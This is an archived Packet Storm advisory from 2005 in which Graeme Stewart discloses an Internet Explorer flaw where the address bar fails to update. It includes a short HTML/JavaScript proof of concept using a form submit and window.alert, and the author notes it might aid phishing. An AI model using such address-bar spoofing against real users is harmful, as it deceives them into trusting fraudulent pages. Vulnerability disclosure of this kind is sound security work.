Lucene search
K

IEurlflaw.txt

🗓️ 25 Jan 2005 00:00:00Reported by Graeme StewartType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Code allows URL call in Internet Explorer without updating the address bar, inviting phishing risks.

Code
`All,  
  
The following (very simple!) code calls a URL in the browser window but  
fails to update the address bar in IE. Looks like the form submission is  
suspended with the interrupt of the 'window.alert' call. IE then fails  
to correctly handle.  
  
Might be helpful in facilitating phishing style attacks. Assuming you  
can spoof the original location.  
  
I'm running windows XP SP2 with all the latest patches. It works  
correctly in FireFox (i.e. the address bar does update).  
  
Not sure if this really is a vulnerability, but would appreciate any  
thoughts.  
  
Thanks,  
  
Graeme Stewart  
  
--snip---  
  
<html>  
<script language="Javascript">  
function page_load(){  
document.location.href='http://www.google.com/';  
window.alert('Incorrect URL');  
}  
</script>  
<body>  
<form>  
<input type="submit" value="Update" name="patch_update"  
onClick="page_load()">  
</form>  
</body>  
</html>  
  
--snip---  
  
P.S My apologies if this is a known vuln. I did do some searching (i.e.  
Google!, but nothing similar came up).  
  
  
-----------------------------------------------------------------------  
The information transmitted is intended only for the person or entity   
to which it is addressed and may contain confidential and/or privileged   
material. Any review, retransmission, dissemination or other use of, or   
taking of any action in reliance upon, this information by persons or   
entities other than the intended recipient is prohibited. If you   
received this in error, please contact the sender and delete the   
material from any computer.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation